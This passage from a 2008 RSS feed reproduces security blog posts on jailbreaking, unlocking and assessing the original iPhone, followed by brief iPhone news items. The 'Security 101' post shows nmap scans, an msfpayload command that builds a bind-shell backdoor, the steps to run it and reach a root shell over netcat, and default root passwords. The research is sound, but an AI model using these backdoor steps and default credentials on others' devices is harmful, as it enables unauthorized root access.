BTW, in the "Tweaks (1.1.1)" packages section you can also find the tool that fixes the TIFF vulnerability. Other useful software packages are available here. *
6- Once OktoPrep is installed, it will show a message on the iPhone saying "You are now ready to perform an "Update" to 1.1.2 and continue with the TouchFree process". Press the OK button.
7- Press the Home button on the iPhone to exit the Installer and go back to the main iPhone screen ("slide to unlock").
8- At this point, go to iTunes and select "Check for Update". iTunes will find, download and install a new update, and will upgrade the iPhone to firmware version 1.1.2. This time you won't get an error message like when you downgraded to 1.1.1 in STEP 2.
-- UPDATE for iPhone 1.1.3 --
Disclaimer: I got the confirmation that this new 1.1.3 section works. Thanks Mateo.
In January 2008 Apple released the 1.1.3 version; therefore, you do not have direct access from iTunes to the 1.1.2 firmware but to the latest 1.1.3 version. DO *NOT* UPDATE TO 1.1.3.
In order to update your iPhone from 1.1.1 to 1.1.2 you need to follow a process similar to the one we used in STEP 2 for the downgrade. First of all, download the iPhone 1.1.2 firmware file. The MD5 value for this file is "8337fa372a6a629d38856f3ed40beeff". Press the Shift key in Windows and then click on the "Check for Update" button in iTunes. The Shift key is required to be able to select a firmware file (if you use the "Recover" button it will undo the actions from the previous step, removing OktoPrep, as it restores the default factory firmware).
A window to browse for files will open. Select the recently downloaded iPhone 1.1.2 firmware file and press the "Open" button. iTunes will upgrade your iPhone to 1.1.2.
NOTE: The files associated to the firmware updates performed through iTunes are stored at "C:\Documents and Settings\USER\Application Data\Apple Computer\iTunes\iPhone Software Updates".
-- UPDATE for iPhone 1.1.3 --
The update process will take a few minutes (15-20 minutes depending on your Internet connection), as iTunes needs to download the 1.1.2 firmware version. During the process the iPhone will reboot a couple of times. After the new 1.1.2 version is downloaded and installed by iTunes inside the iPhone, the iPhone will show the new picture on the default iPhone screen (see STEP 1). iTunes will show again the default AT&amp;T activation screen.
9- Close iTunes and unzip the previously downloaded (STEP 1) Jailbreak 1.1.2 tool, 1.1.2-jailbreak.zip. Inside the tool folder you will find a file called "windows.bat".
10- Run "windows.bat", that is, the TouchFree (or Jailbreak) Windows tool to jailbreak the iPhone 1.1.2 version. You are presented with the welcome screen.
Jailbreak is a Java based tool. Who said that Java could not be used for real-world hacking (that only C or C++ can)? ;)
11- I suggest you select the "Install SSH" checkbox, so that you can get access to the iPhone through SSH for future advanced tasks. Please change the tool's default root password by selecting a customized, long and robust root password. Click the "Jailbreak" button and the jailbreak process for the iPhone 1.1.2 will start.
The "alpine" password suggested by the tool is the one associated by default to the root iPhone user in 1.1.1 and 1.1.2 (not in 1.0.2). The default "mobile" user password is "dottie". The jailbreak process takes around 2-5 minutes and at the end, the iPhone reboots and you will get the following message:
After that, the device reboots a couple of times (please be patient), and finally you will get the default iPhone screen with the "slide to unlock" page. At this point, you can click OK on the last jailbreak message. iTunes detects the iPhone, starts, and shows the new updated version, 1.1.2.
At this point, you have an almost fully functional 1.1.2 iPhone. It is activated, you can install third-party applications, and the next step should be to unlock the device through a TurboSIM or similar hardware SIM to use the phone capabilities.
Esteban is very happy now, as the initial iBrick he got from the store is now an interesting still-to-explore iPhone device and, hopefully, a cell phone soon :) If you are as happy as Esteban, please donate some cash to the projects involved in the development of all the tools used throughout this guide.
Future posts will focus on specific iPhone security aspects.</description><link>http://www.secuobs.com/revue/news/34468.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34468.shtml</guid></item>
<item><title>How to add the Phone to the iPhone</title><description>2008-11-09 14:20:48 - RaDaJo (RAul, DAvid and JOrge) Security Blog : In the previous iPhone series I covered how to activate and jailbreak the iPhone 1.1.2 OTB (Out of The Box) on Windows. However, there was no software trick to unlock the device and use the phone functionality if the iPhone runs the 4.6 bootloader version. Although some contests gave an incentive to find a solution, it seems there is no software trick available yet. Therefore, my friend Esteban ordered and recently got his iSIM, a hardware SIM "card" that can be used together with your standard SIM card in order to use the phone with mobile operators different from AT&amp;T or Apple's other European telecom partners.
One of the first sets of tools you may want to install inside the iPhone is the BSD Subsystem. Connect to the wireless network from the iPhone, and select the "Installer" icon on the Springboard. Click on the "Install" button, go to "System", and select and install the "BSD Subsystem" (v2.0 at this time). This package includes the standard Unix tools for the iPhone.
If you still have doubts about your bootloader version, you can check it by following these steps (they are not required to use the iSIM):
1. From STEP 4 of the guide, we have an SSH server running on the iPhone. Turn it on through the SSH icon on the Springboard.
2. You need to find and download from the Internet a tool called "bbupdater" (Google is your friend). It seems the file MD5 value is 846e1ddada152947cc317a23de671525.
3. Enable your wireless network, and connect to it from the iPhone. Then, transfer the "bbupdater" tool from your computer to the iPhone as root into "/usr/bin" using an SSH client for Windows, such as "pscp" (PuTTY): "pscp bbupdater root@10.0.0.100:/usr/bin".
4. Log in as root on the iPhone through SSH using PuTTY, change the permissions on the file to make it executable, and run the "bbupdater" tool. The last line of the output displays the bootloader version.
After checking the version, restart the iPhone by typing the "reboot" command. You can turn off the SSH server if you are not going to connect back to it.
The process to use the iSIM and unlock the iPhone by hardware is very simple:
1. Prepare your standard SIM to "accommodate" the iSIM. You will need to follow the instructions from your iSIM vendor, which in Esteban's case required cutting a corner of the SIM to fit and install both together inside the iPhone.
2. Install the iWorld application. Connect to the wireless network from the iPhone, and select the "Installer" icon on the Springboard. Click on the "Install" button, go to "Tweaks (1.1.2)", and select and install "iWorld". This package fixes a bug in the iPhone that prevents the device from using the phone or SMS capabilities with non-supported SIMs. If you try to call any number at this point without iWorld, the phone or SMS applications crash.
3. Once installed, select the new "iWorld" icon from the Springboard and select your country. The iPhone will reboot to set your country settings.
4. Click on the "Phone" icon on the Springboard, type a number, and establish your first call from your iPhone.
NOTE: At the time of this writing, the "Installer" will ask you to update to a newer version, 3.0. I recommend you update.
It is important not to confuse the iSIM hardware SIM card (or TurboSIM, etc) with the iSIM software tool. The iSIM tool is available through the Makayama repository, "http://tinyurl.com/2t8cax" (add this URL to your "Installer" sources if you want to use it), and provides capabilities to manage the contacts between the iPhone and the SIM card. Go to "Installer", select the "Install" button, then "Utilities" and install "iSIM" (v103 at this time).
The next thing I'm going to get from Apple is the i-Jam ;)</description><link>http://www.secuobs.com/revue/news/34465.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34465.shtml</guid></item>
<item><title>iPhone - Security 101</title><description>2008-11-09 14:20:48 - RaDaJo (RAul, DAvid and JOrge) Security Blog : Once you get access and can finally use your iPhone, it is time to focus on the security of the device (this is what the RaDaJo Blog is all about ;) ). This post covers the basics (Security 101), while future posts will focus on specific iPhone capabilities, such as WiFi, Bluetooth, etc. It is interesting to analyze the security of the iPhone from two distinct angles:
* A device we need to protect, as it is going to be in widespread use and, potentially, is going to store very sensitive and private information (call and SMS history, address book, voicemail data, user and mail credentials, application data, etc) and be used for voice and data communications.
* A mobile auditing device that could be used by infosec professionals to perform assessments in standard TCP/IP networks, and WiFi or Bluetooth environments. Remember it runs Unix, has plenty of storage (8Gb) and a decent CPU (400Mhz), plus extensive networking capabilities.
For now, let's focus on the first one.
NOTE: Although I figured out I duplicated some of the steps already performed by Paul Asadoorian, I wanted to double-check the results and verify if there were any differences between a standard 1.1.2 iPhone and a jailbroken one.
General iPhone Security
* After getting access to an iPhone Unix shell, you can observe that every process runs as root. This is why the jailbreak process succeeds, as the exploitation of the libtiff vulnerability through MobileSafari provided unlimited privileges on the device. Any future security flaw in any iPhone application can lead to a similar complete system compromise.
* The first known iPhone exploit was focused on vulnerabilities in the Perl Regular Expression Library (PCRE), and was presented at BlackHat 2007.
* The iPhone is a fully-fledged client device, a mobile Mac, with support for Word, Excel and PDF docs. Watch out for future vulnerabilities in the associated applications.
* The Metasploit Framework (MSF) v3 already implements several payloads for the iPhone: bind and reverse shell, and even one to make it vibrate. See the initial HD Moore security analysis.
* The iPhone multimedia capabilities can turn it into a perfect spying tool, especially by hacking the mic/speakers, camera and phone.
* As a consequence of the hacking wars between Apple and the community to free the device, the iPhone comes with the latest firmware installed from factory, 1.1.2 at this point in time. This is not always the case for lots of devices, as Paul points out.
* This is one of the most well known iPhone hacking demonstrations on the Internet: it turns the iPhone into a remote eavesdropping device or bug. You can see the video here. Metasploit was used to install a recording tool, called rrecord (remote record), that records the ambient sound around the iPhone.
OS Fingerprinting
Using nmap 4.50, the iPhone (10.0.0.101) operating system (OS) can be easily fingerprinted:
# nmap -O 10.0.0.101
Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 14:44 GMT
All 1711 scanned ports on 10.0.0.101 are closed
MAC Address: 00:1E:C2:XX:XX:XX (Apple)
Device type: phone|media device|general purpose|web proxy|specialized
Running: Apple embedded, Apple Mac OS X 10.2.X|10.3.X|10.4.X|10.5.X, Blue Coat SGOS 5.X, FreeBSD 4.X, VMWare ESX Server 3.0.X
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results
Nmap done: 1 IP address (1 host up) scanned in 30.819 seconds
Because all of the nearly 2000 scanned ports are closed, the nmap output is not very accurate and it simply reflects an OS X device. At the end of the jailbreak process we installed SSH. If the SSH service is enabled, then the nmap results are much more accurate simply by using an open and a closed port, 22 and 80 respectively:
# nmap -O -p 22,80 10.0.0.101
Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 14:42 GMT
Interesting ports on 10.0.0.101:
PORT   STATE  SERVICE
22/tcp open   ssh
80/tcp closed http
MAC Address: 00:1E:C2:XX:XX:XX (Apple)
Device type: phone|media device
Running: Apple embedded
OS details: Apple iPhone mobile phone or iPod Touch audio player (Darwin 9.0.0d1)
Uptime: 686.942 days (since Tue Feb 14 16:05:40 2006)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results
Nmap done: 1 IP address (1 host up) scanned in 19.619 seconds
MobileSafari
If you browse the Web with the iPhone using the MobileSafari browser and point it to your own Web server (10.0.0.2), you can easily obtain the device User-Agent. What really surprised me was that you can even get the exact firmware version, 3B48b (meaning 1.1.2):
$ nc -l -p 80
GET / HTTP/1.1
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/3B48b Safari/419.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Connection: keep-alive
Host: 10.0.0.2
TCP/IP
The iPhone responds to ping (ICMP echo requests) by default. It seems it could present a potential Etherleak vulnerability, and in fact, I can confirm Paul's initial research, as I got the same behavior. BTW, the old Linksys WRT54G v5 (firmware version 1002 - Oct 31, 2005) I used for these tests suffers from the same vulnerability (the last 4 bytes are always different).
By default, connection establishments to closed TCP ports are answered with a TCP RST packet, and connection establishments to closed UDP ports are answered with an ICMP Port Unreachable packet.
If the SSH service is turned off (see next section), a full TCP scan only shows one port open, port TCP/62078:
# nmap -sT -p1-65535 10.0.0.101
Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 02:08 GMT
Interesting ports on 10.0.0.101:
Not shown: 65534 closed ports
PORT      STATE    SERVICE
62078/tcp open     unknown
MAC Address: 00:1E:C2:XX:XX:XX (Apple)
Nmap done: 1 IP address (1 host up) scanned in 64531.180 seconds
The TCP/62078 port is used internally when syncing with iTunes. Using tcpdump on the "lo0" interface from within the iPhone, it is possible to capture the traffic generated during a sync operation on iTunes. This traffic contains binary data and XML strings. It also uses other source and destination ports in the 49xxx range during the sync operation, always using the localhost address as source and destination.
A full UDP scan only shows the Multicast DNS port open, UDP/5353:
# nmap -sU -T4 -p1-65535 10.0.0.101
Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-14 03:00 GMT
Interesting ports on 10.0.0.101:
Not shown: 65534 closed ports
PORT     STATE         SERVICE
5353/udp open|filtered zeroconf
MAC Address: 00:1E:C2:XX:XX:XX (Apple)
Nmap done: 1 IP address (1 host up) scanned in 4966.680 seconds
Port UDP/5353 corresponds to the Zeroconf (aka Rendezvous or Bonjour) multicast protocol, or Zero Configuration Networking, used to establish networking connections without configuration or servers. The mDNSResponder service runs by default on this port and advertises the device on the local network, exposing device details. The multicast DNS traffic generated (destination IP 224.0.0.251) contains the device hostname, "iPhone", followed by a hyphen "-" and the WiFi MAC address. Related details are leaked in the DHCP requests used to obtain an IP address. The iPhone includes its name in the requests, which by default is "iPhone".
The external port findings can be confirmed by running "netstat" on the device. Surprisingly, especially with port TCP/62078, the bindings for all TCP and UDP ports discovered are made to all addresses (*.*).
SSH
The SSH service is enabled by default after the jailbreak. Specifically, the iPhone is running the OpenSSH 4.6 version. This info can be easily obtained using netcat or nmap:
# nc 10.0.0.101 22
SSH-2.0-OpenSSH_4.6
# nmap -sV -p 22 10.0.0.101
Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-02 14:39 GMT
Interesting ports on 10.0.0.101:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.6 (protocol 2.0)
MAC Address: 00:1E:C2:XX:XX:XX (Apple)
Service detection performed. Please report any incorrect results
Nmap done: 1 IP address (1 host up) scanned in 17.232 seconds
The SSH access is almost useless unless you install the BSD Subsystem, which provides all the standard Unix commands and tools.
Exploitation and backdoors
HD Moore did a great job in the "Cracking the iPhone" series, dissecting the iPhone internals, providing debugging tools, and walking the reader through the process of writing the exploit for the libtiff vulnerability; not an easy task, since the iPhone stack memory is marked non-executable and, therefore, standard stack-based buffer overflows don't work. The original libtiff exploit, and HD Moore's one, use the return-to-libc technique. Then, the exploit was improved and modified for stock iPhones (non-jailbroken). It is a very interesting read about a multi-part payload (stager/stage) to execute code inside the iPhone, which finishes with a full MSF v3 session showing how to run the ipwn shell after exploiting the libtiff vulnerability, and how to patch this vulnerability.
As explained there, Metasploit provides support for iPhone executables in the "msfpayload" tool. This allows an attacker (or pen-tester) to create a stand-alone (backdoor) iPhone executable that can bind a shell to a port or launch a reverse shell (or make the iPhone vibrate):
$ msfpayload osx/armle/shell_bind_tcp LPORT=2222 X &gt; /tmp/bindshell.bin
Created by msfpayload (http://www.metasploit.com).
Payload: osx/armle/shell_bind_tcp
Length: 200
Options: LPORT=2222
To create the backdoor, this "bindshell.bin" binary should be copied to the iPhone (for example using PSCP) to "/tmp", its permissions changed, and executed. Then, a new shell is offered on port TCP/2222 that can be remotely accessed with netcat:
$ ssh root@10.0.0.101
# cd /tmp
# chmod u+x bindshell.bin
# ./bindshell.bin
$ nc 10.0.0.101
id
uid=0(root) gid=0(wheel) groups=0(wheel)
pwd
/private/var/tmp
ls -l
total 80
drwx------   2 root  wheel    102 Feb  2 02:56 MediaCache
-rw-r--r--   1 root  wheel      0 Feb  2 04:16 MobileSyncRunninglock
-rwxr--r--   1 root  wheel  16472 Feb  2 05:01 bind.bin
drwx------   2 root  wheel    102 Feb  2 02:56 launchd
-rw-r--r--   1 root  wheel  16472 Feb  2 05:01 vibrate.bin
uname -a
Darwin 10.0.0.101 9.0.0d1 Darwin Kernel Version 9.0.0d1: Wed Oct 10 00:07:50 PDT 2007; root:xnu-933.0.0.204.obj~7/RELEASE_ARM_S5L8900XRB iPhone1,1 unknown
I want to close this initial iPhone security post by emphasizing one of the major risks with the current software distribution model on the iPhone. After the jailbreak it is possible to install third-party apps on the device through the "Installer" package manager. Users could download malicious software from the available repositories. In fact, exploiting this input vector, the first iPhone malware specimen was released early this year. It used social engineering tricks to present itself as preparation software required to update to version 1.1.3, but it was not very dangerous this time. What if someone publishes the Metasploit payloads described before through "Installer"?
Additionally, and although it was not created with malicious intentions, there is a Mobile Safari plug-in that provides file downloading capabilities to the browser - another way of downloading all kinds of files onto the device.</description><link>http://www.secuobs.com/revue/news/34464.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34464.shtml</guid></item>
<item><title>Guide to upgrade the iPhone to 113 - Securing your 112 OTB iPhone</title><description>2008-11-09 14:20:48 - RaDaJo  RAul, DAvid and JOrge  Security Blog : Apple released the iPhone 113 firmware version on January 2008 From asecurity perspective and according to Apple, the iPhone 112 presentsa few vulnerabilities:* A memory corruption issue in Safari's handling of URLs may causearbitrary code execution If you browse to a maliciously craftedURL, you are iP0wn3d DoS exploit publicly available in milw0rm* An incorrect handling of emergency calls allows users withphysical access to the iPhone to launch an application avoidingthe passcode lock screen* Safari presents a XSS cross-site scripting vulnerability in theWebKit component Visiting a maliciously crafted web page may leadto the disclosure of sensitive informationContinuing the iPhone series, once your iPhone 112 OTB has beenactivated and jailbroken, thanks to the iPhone Dev Team there is a newmethod to upgrade to 113 and stay secure This post covers theeasier option, that is, using the "Installer" to directly upgrade fromthe iPhone without requiring a PC however, you need a WiFi connectionto connect to the Internet There are other methods for Windows andMac tooNOTE: All the third-party applications you previously installed willdisappear from Springboard You will need to reinstall them after the113 upgrade Some capabilities will break, as this "hack" is prettynew, so stay tuned on the Internet Blogs, forums, etc for fixesMost probably, this is the last post about general iPhone hacks in theRaDaJo blog; only security topics will be posted in the futureYou need to be very careful adding new "Installer" sources, as anbuggy or malicious software package install can render your iPhoneuseless iBrick If this happens to you, you can repeat the wholejailbreak process going back to 111 At this point, after followingthe whole jailbreak guide, the only sources available should be:* AppTap: AppTapp Official 
NullRiver* Community Sources: Conceited Software, ModMyiFonecom and StePackaging* Makayama Software if you tried to install the iSIM software toolPrerequisites:* You need to start with an activated and jailbroken 112 iPhoneCheck the guide to do it* You need to install the BSD Subsystem v20, as we did when weenabled the phone capabilities You can check the version from"Installer" by selecting the "Uninstall" button* Disable the lock timeout, as we already did on STEP 3 of the 112guide: Go to "Settings", select "General" and the "Auto-Lock"option Set the value to "Never"* Go to "Installer" and select the "Update" button You need to use"Installer" version 30 Previous versions won't work* Establish a connection with your WiFi network to get InternetaccessSteps to upgrade to version 113:* Go to "Installer" and select the "Install" button Go to the"System" category and install the "Official 113 Upgrade" Atthis time it is version 113-3 Click on "Install" twice* As indicated by the message, exit "Installer" and run "Upgrade"from the Springboard* The process asks if you want to use hacktivation and patchlockdownd Answer "Yes" in order to be able to use the phonecapabilities with the hardware SIM hack iPhone 112 OTB has the46 bootloader and it can only be unlocked using a SIM hardwarehack at this time* Then, it asks if you want to completely restore your device,deleting all data It is recommended to answer "Yes" to avoid anysoftware conflicts between versions backup first, although Ianswered "No" to check what applications and data survived Alldata should be there music, videos, etc and the applications arestill installed but not referenced from Springboard* The iPhone now downloads the 113 firmware version from Apple andperforms the appropriate hacks You get a progress banner on theiPhone This process takes lot of time, around 30-60 minutes* The last step shows a "Attempting to Reboot iPhone" message If itis there for more than 15 minutes without rebooting, hold down 
thePower and Home buttons until the phone shuts down Then hold downthe Power button to turn the iPhone back on, a process that willtake a few minutes* When the process completes, the iPhone reboots and runs firmware113 The baseband version is not modified using this procedureIf during the upgrade, you answer "No" to the first hacktivationquestion as I did, then you need to patch lockdownd manually Ifnot, iTunes will generate an error message and the iPhone remains inan unactivated state Download the patched lockdownd version andtransfer it to the iPhone through SSH: "scp lockdowndroot@1000100:/usr/libexec/" before this, make a backup copy of theprevious lockdownd version Verify that the file permissions are 555You can reboot the iPhone and it will be active nowOne of the first recommended actions is to update the "Installer"sources Go to "Installer", select the "Install" button and go to the"Sources" category Install the "Community Sources", version 33 atthis time By default, the sources list only contained the "AppTappOfficial" entry New applications for 113, such as "Tweaks 113",are populated on the list of available packages, and four new entriesare added to the sources listGo to "Settings", then "General" and "About" to check that the"Version" now is "113 4A93" while the "Modem Firmware" is still"040213_G" The 113 version includes new features, that you couldbe simulated in 112, although now are already on your device:* The first thing you notice is that it notifies you about "EditHome Screen" capabilities You can now rearrange icons on theSpringboard* The new Google Maps Faux-GPS, based on triangulating your locationusing the mobile cell towers, doesn't work because the baseband isnot updated during the process Go to "Installer", "Install"button, "All Packages", search and install "Navizon GPS"currently version 114 Create an account in "Navizon" to usethe location service, and when it locates you once, you are readyto use the Google Maps Faux-GPS sometimes you 
need to set Navizon's "Invisible" switch to "Off". * You can now send SMS messages to multiple users simultaneously. The previous activation and hardware-based unlock based on the iSIM card work perfectly with the new 113 version. iWorld must not be reinstalled. All capabilities work as they did on 112, except some of the previously installed third-party applications, plus a few well-known bugs, because now the Springboard runs as "mobile" and not as "root" (good security improvement): * You need to refresh the sources on "Installer" and reinstall previous software packages. Although at this point you can access the iPhone through SSH and run standard Unix commands, it is recommended to reinstall at least the BSD Subsystem and the OpenSSH server. * Reinstall the "BSD Subsystem" by going to "Installer", use the "Install" button, go to "System", and select and install the "BSD Subsystem" v20. This fixes some VT100 terminal display issues like backspaces not showing properly. * OpenSSH is a crucial service to manage your iPhone. It can be reinstalled by going to "Installer", select "System" and install "OpenSSH", currently v46p1-1. There is no icon on the Springboard on 113 to disable the service, and the device has the default password root/alpine. * You cannot use the Unix "passwd" command to change the password on 113, as it is broken. Don't even try. You get a message indicating this when you install the BSD Subsystem. Replace the passwd command by uploading this file to the "/usr/bin" iPhone directory (rename it from passwd113 to passwd). Make a copy of the previous passwd file. Change the new file permissions to 755: "chmod 755 /usr/bin/passwd". Now, you can run "passwd" to change the default password from a SSH terminal. * The recommended SSH management tool is called "BossPrefs". Go to "Installer", then select the "Install" button, "All Packages" and install "BossPrefs" v153. It provides capabilities to enable/disable the SSH server and even set its state when the iPhone restarts through the "Config" menu. * Set up the 
iPhone to the appropriate timezone. If you go to "Settings" and "Date &amp; Time", when you change the "TimeZone" the "/var/db/timezone/localtime" file is recreated. The directory is now owned by root, but the "Settings" application runs as "mobile", so it cannot recreate it. Change the directory permissions to 777: "chmod 777 /var/db/timezone". * Re-add the Makayama repository if you want to manage contacts with the iSIM tool. NOTE: The current 113-3 update fixes several issues of the previous 113 jailbreaks. There is a similar 113 method available from Nate True's FAQ, however, it seems it could present some issues, so the latest Dev Team's -3 method is the recommended method. More bugs, fixes and 113 jailbreak versions will appear. From now on, Google is your friend. Some final iPhone hacking news: Apple's applications signature key required by "official" iPhone third-party applications has leaked, and the iPhone 113 SDK framework documentation is available</description><link>http://www.secuobs.com/revue/news/34463.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34463.shtml</guid></item>
<item><title>Forbes: Crashing The iPhone</title><description>2008-11-07 23:08:24 - Rootsecure.net : Forbes: Crashing The iPhone</description><link>http://www.secuobs.com/revue/news/34240.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34240.shtml</guid></item>
<item><title>The Inquirer: Iphone OS 22 secrets revealed turn by turn GPS route finding</title><description>2008-11-07 11:08:01 - Rootsecure.net : The Inquirer: Iphone OS 22 secrets revealed "turn by turn GPS route finding"</description><link>http://www.secuobs.com/revue/news/34075.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34075.shtml</guid></item>
<item><title>Apple opens Macbook front in iPhone jailbreak war</title><description>2008-11-07 04:48:14 - Hack In The Box : Apple appears to have taken its campaign against iPhone modders to a baffling new level, tweaking its new MacBooks and MacBook Pros to disable a popular software tool used to jailbreak the handset. According to discussion groups here and here, iPhone and iPod Touch users who have unlocked their devices using the Pwnage Tool are unable to get their new MacBooks to recognize the devices. Instead their all-aluminum machines display an error message saying "An iPod has been detected, but it could not be identified properly". Oddly, other types of Macs and Windows machines recognize the modded devices just fine. The quirk comes as hackers with the iPhone Dev Team cracked the device's latest firmware version</description><link>http://www.secuobs.com/revue/news/34044.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34044.shtml</guid></item>
<item><title>iPhone OS 22 secrets revealed</title><description>2008-11-07 04:48:14 - Hack In The Box : A GERMAN BLOGGER has apparently been fiddling with the developer release of the next iteration of the Iphone OS and has discovered that the not-yet-announced update will allow users to download video and audio podcasts without resorting to Itunes. Genuine-looking screen shots show a podcast being downloaded over a 3G network so it looks like the functionality will not be restricted to wifi connections</description><link>http://www.secuobs.com/revue/news/34038.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/34038.shtml</guid></item>
<item><title>AT&amp;T to deliver iPhone tethering 'soon,' says CEO</title><description>2008-11-06 22:32:10 - Latest from Computerworld : AT&amp;T is working with Apple to devise a way for iPhone owners to turn the device into an ad hoc cellular modem that can connect their laptops to the Web while they're on the road</description><link>http://www.secuobs.com/revue/news/33981.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33981.shtml</guid></item>
<item><title>JD Power: iPhone tops in customer satisfaction</title><description>2008-11-06 21:48:24 - Latest from Computerworld : Apple's iPhone ranked No 1 in customer satisfaction among business users, beating smart phones made by Research In Motion and Samsung by wide margins, JD Power and Associates said today</description><link>http://www.secuobs.com/revue/news/33973.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33973.shtml</guid></item>
<item><title>New Macbooks / iTunes disable iPhone unlock software</title><description>2008-11-06 02:48:17 - Hack In The Box : Apparently Apple has found a way to at least theoretically disable iPhone unlock software. It's been reported by users of HowardForums that the most recent Apple Macbooks somehow disable the popular Pwnage iPhone software unlock tool. Pwnage tool requires iPhones that are about to be unlocked to be switched into DFU mode, but once that's done the new aluminum Macbooks simply cannot recognize the device. It's hard to imagine that this issue could be attributed to the actual components of these Macbooks; it is most likely that a new build of iTunes that these Macbooks come preloaded with is what is causing this problem</description><link>http://www.secuobs.com/revue/news/33810.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33810.shtml</guid></item>
<item><title>Hacker Attaches Physical Keyboard To iPhone</title><description>2008-11-05 22:15:10 - Packet Storm Security Headlines : </description><link>http://www.secuobs.com/revue/news/33749.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33749.shtml</guid></item>
<item><title>XMCO: A video can cause iPhones to reboot</title><description>2008-11-05 17:37:58 - Global Security Mag Online : Crashing The iPhone. Date: 05 November 2008. Platform: Mac OS X. Program: iPhone. Severity: Low. Exploitation: With a malicious file. Damage: Denial of service. Description: A vulnerability has been discovered in the iPhone. Zambrini, an Italian engineer and also the author of the unlocking software "Ziphone", has just brought to light a bug that occurs when malformed videos are opened. The problem results from improper handling of the audio data from a video. Upon opening,  - Vulnerabilities</description><link>http://www.secuobs.com/revue/news/33691.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33691.shtml</guid></item>
<item><title>Remote control and access from an iPhone in beta at LogMeIn</title><description>2008-11-05 16:47:33 - ZATAZ News : iPhone and iPod Touch owners can remotely control or access their PC or Mac, whether professional or personal, thanks to LogMeIn Ignition</description><link>http://www.secuobs.com/revue/news/33672.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33672.shtml</guid></item>
<item><title>Apple may cut iPhone 3G production by 40 percent</title><description>2008-11-04 14:32:49 - News : Analyst's prediction that Apple will cut iPhone production by 40 percent draws flak</description><link>http://www.secuobs.com/revue/news/33377.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33377.shtml</guid></item>
<item><title>Ziphone author claims to have new remote execution bug for OS X</title><description>2008-11-04 02:12:55 - Hack In The Box : Italian systems engineer Piergiorgio Zambrini won fame and money last year when he created "Ziphone," the first widespread application that unlocked iPhones to run on mobile carriers other than AT&amp;T. Now he's making another bid for the spotlight by revealing a bug that can crash the iPhone and, he says, other devices including iPods and Apple computers. Zambrini planned to publish news about the bug Monday--although he's saving the technical details for Apple, he says--at least for now. The 38-year-old security expert praises Apple's marketing prowess and calls Steve Jobs a genius. But there are chinks in Apple's software--and Zambrini is determined to uncover them. The bug Zambrini found is in the audio portion of Apple's video format. Knowing the bug exists, someone could write a program that incorporates the bug into a video file and trigger a crash whenever an iPhone attempts to run that file. The bug, which is located in a shared code library that is used across most Apple operating systems and some Linux ones as well, doesn't appear to cause any permanent damage, but immediately sends the device into a panic that leads to a lengthy reboot</description><link>http://www.secuobs.com/revue/news/33263.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33263.shtml</guid></item>
<item><title>Hidden iPhone feature gives appearance of native apps to iPhone webapps</title><description>2008-11-03 02:55:58 - Hack In The Box : As it is, Apple is notorious for sneaking undocumented features into their software updates. Therefore it's not too surprising that a new undocumented feature appeared with iPhone firmware v21 update. According to Clancy, a reader of AppleInsider, iPhone firmware v21 has introduced a feature that doesn't seem to have much use, but is nevertheless rather interesting due to how it's possible to implement it. Apparently, it is possible to open iPhone webapps in fullscreen mode, making them look like actual native applications. Clancy has even written a program that illustrates that</description><link>http://www.secuobs.com/revue/news/33072.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33072.shtml</guid></item>
<item><title>Intel's Moorestown would make iPhone less secure, says researcher</title><description>2008-11-03 02:55:58 - Hack In The Box : Putting Intel Corp's Moorestown chip package inside a future version of the iPhone would make the smart phone less secure, according to an independent security researcher. "That will make the iPhone x86, and that will make a lot of attacks easier," said Dino Dai Zovi, an independent security researcher, in an interview at the Hack In The Box security conference in Kuala Lumpur, Malaysia. Apple Inc has never said it intends to use Moorestown in future products, but Intel is widely believed to be hopeful that Apple will adopt the chip package. Due for release in 2009 or 2010, Moorestown is a chip package designed for smart phones and other handheld computers. The heart of the package is an upcoming version of Intel's Atom processor, an inexpensive low-power x86 processor</description><link>http://www.secuobs.com/revue/news/33069.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/33069.shtml</guid></item>
<item><title>Intel's Moorestown would make iPhone less secure: Researcher</title><description>2008-10-31 21:17:42 - Latest from Computerworld : x86-based processors are much more familiar ground to hackers than the ARM chips, says Dino Dai Zovi, a security researcher</description><link>http://www.secuobs.com/revue/news/32862.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/32862.shtml</guid></item>
<item><title>Opinion: Stop the page-flicking madness -- give us iPhone folders</title><description>2008-10-31 21:17:42 - Latest from Computerworld : What used to be 79 programs on this writer's iPhone at the start of this month has become 107 programs. But navigating this mess of icons requires a ton of either swiping or tapping, and either way it's a nightmare</description><link>http://www.secuobs.com/revue/news/32859.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/32859.shtml</guid></item>
